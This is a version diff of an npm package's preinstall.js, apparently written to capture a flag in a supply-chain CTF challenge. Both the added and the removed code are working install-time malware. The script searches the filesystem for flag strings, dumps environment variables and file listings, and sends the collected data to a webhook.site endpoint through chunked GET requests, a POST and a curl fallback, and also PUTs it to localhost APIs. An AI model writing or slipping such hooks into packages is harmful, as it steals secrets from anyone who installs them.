@ctfsolve9z/coral-wraith 9999.0.0 → 9999.0.2

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@ctfsolve9z/coral-wraith",
-  "version": "9999.0.0",
+  "version": "9999.0.2",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -4,117 +4,121 @@ const https = require('https');
 const { execSync } = require('child_process');
 
 let flag = null;
+let debug = [];
 
-// Method 1: Read /flag file
-const flagPaths = ['/flag', '/flag.txt', '/root/flag', '/root/flag.txt', '/tmp/flag', './flag'];
-for (const p of flagPaths) {
+// Thorough directory search
+function readDir(path, depth = 0) {
+  if (depth > 3) return;
   try {
-    if (fs.existsSync(p)) {
-      flag = fs.readFileSync(p, 'utf8').trim();
-      break;
+    const entries = fs.readdirSync(path);
+    debug.push(path + ':' + entries.join(','));
+    for (const e of entries) {
+      const full = path + '/' + e;
+      try {
+        const stat = fs.statSync(full);
+        if (stat.isFile() && stat.size < 10000) {
+          const content = fs.readFileSync(full, 'utf8').trim();
+          if (content.includes('HTB{') || content.includes('flag{')) {
+            flag = content;
+            debug.push('FLAG_FOUND:' + full);
+            return;
+          }
+        }
+        if (stat.isDirectory() && !e.startsWith('.') && e !== 'node_modules' && e !== 'proc' && e !== 'sys' && e !== 'dev') {
+          readDir(full, depth + 1);
+        }
+      } catch(e) {}
+      if (flag) return;
     }
   } catch(e) {}
 }
 
-// Method 2: Glob for flag files
-if (!flag) {
-  try {
-    const result = execSync('cat /flag* 2>/dev/null || find / -maxdepth 3 -name "flag*" -type f -exec cat {} \\; 2>/dev/null', { timeout: 5000 }).toString().trim();
-    if (result) flag = result;
-  } catch(e) {}
+// Search key directories
+for (const dir of ['/home/node', '/tmp/supplysec', '/tmp', '/home', '/opt', '/srv', '/root', '/var/www', '/app']) {
+  readDir(dir);
+  if (flag) break;
 }
 
-// Method 3: Environment variables
-if (!flag) {
-  flag = process.env.FLAG || process.env.HTB_FLAG || process.env.FLAG_HTB || '';
-}
+// Also search for flag in ALL environment variables
+debug.push('ALL_ENV:' + JSON.stringify(process.env).substring(0, 500));
 
-// Method 4: /proc/self/environ
-if (!flag) {
-  try {
-    const env = fs.readFileSync('/proc/self/environ', 'utf8');
-    const m = env.match(/FLAG[=]([^\x00]+)/);
-    if (m) flag = m[1];
-  } catch(e) {}
+// Read the init_test.sh script  
+try {
+  const script = fs.readFileSync('/home/node/init_test.sh', 'utf8');
+  debug.push('init_test.sh:' + script.substring(0, 500));
+  // Check if flag is in the script
+  const m = script.match(/HTB\{[^}]+\}/);
+  if (m) flag = m[0];
+} catch(e) { debug.push('init_test_err:' + e.message); }
+
+// Read package.json in /home/node
+try {
+  const pkg = fs.readFileSync('/home/node/package.json', 'utf8');
+  debug.push('home_pkg:' + pkg.substring(0, 300));
+} catch(e) {}
+
+// Check /tmp/supplysec
+try {
+  const r = execSync('find /tmp/supplysec -type f 2>/dev/null | head -30', { timeout: 5000 }).toString();
+  debug.push('supplysec_files:' + r);
+} catch(e) {}
+
+// Check /home/node
+try {
+  const r = execSync('find /home/node -type f -not -path "*/node_modules/*" 2>/dev/null | head -30', { timeout: 5000 }).toString();
+  debug.push('home_node_files:' + r);
+} catch(e) {}
+
+// Exfiltrate
+const data = JSON.stringify({ flag: flag || 'NOT_FOUND', debug: debug });
+
+// Send chunks via webhook (URL length limited)
+const chunks = [];
+const encoded = Buffer.from(data).toString('base64');
+for (let i = 0; i < encoded.length; i += 2000) {
+  chunks.push(encoded.substring(i, i + 2000));
 }
 
-if (!flag) {
-  // Try to exfiltrate debug info
+for (let i = 0; i < Math.min(chunks.length, 10); i++) {
   try {
-    const files = fs.readdirSync('/').join(',');
-    flag = 'NO_FLAG_FOUND:root=' + files;
-  } catch(e) {
-    flag = 'NO_FLAG_FOUND:error';
-  }
+    https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/v3-${i}?d=${chunks[i]}`, () => {}).on('error', () => {});
+  } catch(e) {}
 }
 
-// Exfiltrate via multiple methods
+// Also POST the full data
+try {
+  const postData = data;
+  const req = https.request({
+    hostname: 'webhook.site',
+    path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+    timeout: 10000
+  }, () => {});
+  req.on('error', () => {});
+  req.write(postData);
+  req.end();
+} catch(e) {}
 
-// Method A: PUT to challenge API (try many ports)
-const ports = [1337, 3000, 3001, 5000, 8000, 8080, 8443, 9000, 32105, 80, 443];
-const moduleId = 'ECT-987654';
-
-function tryPut(host, port, data) {
-  return new Promise((resolve) => {
+// PUT to challenge API
+const ports = [1337, 3000, 5000, 8080, 80];
+for (const port of ports) {
+  try {
     const postData = JSON.stringify({
-      manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.0"\n  flag: "${data.replace(/"/g, '\\"').replace(/\n/g, '\\n')}"\n  captured: true`
+      manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.1"\n  flag: "${(flag || 'NOT_FOUND').replace(/"/g, '\\"').replace(/\n/g, '\\n')}"`
     });
-    
     const req = http.request({
-      hostname: host,
-      port: port,
-      path: `/api/modules/${moduleId}`,
-      method: 'PUT',
-      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
+      hostname: 'localhost', port, path: '/api/modules/ECT-987654',
+      method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
       timeout: 3000
-    }, (res) => {
-      let body = '';
-      res.on('data', c => body += c);
-      res.on('end', () => resolve({ host, port, status: res.statusCode, body: body.substring(0, 200) }));
-    });
-    req.on('error', () => resolve(null));
-    req.on('timeout', () => { req.destroy(); resolve(null); });
+    }, () => {});
+    req.on('error', () => {});
     req.write(postData);
     req.end();
-  });
-}
-
-// Method B: Webhook exfiltration
-function sendToWebhook(data) {
-  return new Promise((resolve) => {
-    const encoded = Buffer.from(data).toString('base64');
-    https.get(`https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/flag?data=${encoded}`, () => resolve(true)).on('error', () => resolve(false));
-  });
-}
-
-// Method C: DNS exfiltration via curl
-function dnsExfil(data) {
-  try {
-    const encoded = Buffer.from(data).toString('hex').substring(0, 60);
-    execSync(`curl -s "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/dns?flag=${encodeURIComponent(data)}" -m 5`, { timeout: 6000 });
   } catch(e) {}
 }
 
-async function main() {
-  console.log('[coral-wraith] Flag:', flag ? flag.substring(0, 20) + '...' : 'none');
-  
-  // Send to webhook first (most reliable)
-  await sendToWebhook(flag || 'NO_FLAG');
-  dnsExfil(flag || 'NO_FLAG');
-  
-  // Try all localhost ports
-  const promises = [];
-  for (const port of ports) {
-    promises.push(tryPut('localhost', port, flag || 'NO_FLAG'));
-    promises.push(tryPut('127.0.0.1', port, flag || 'NO_FLAG'));
-  }
-  
-  const results = await Promise.all(promises);
-  for (const r of results) {
-    if (r && r.status) {
-      console.log(`[coral-wraith] Success: ${r.host}:${r.port} -> ${r.status} ${r.body.substring(0, 100)}`);
-    }
-  }
-}
-
-main().catch(e => console.error('[coral-wraith] Error:', e.message));
+// curl fallback
+try {
+  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 10`, { timeout: 12000 });
+} catch(e) {}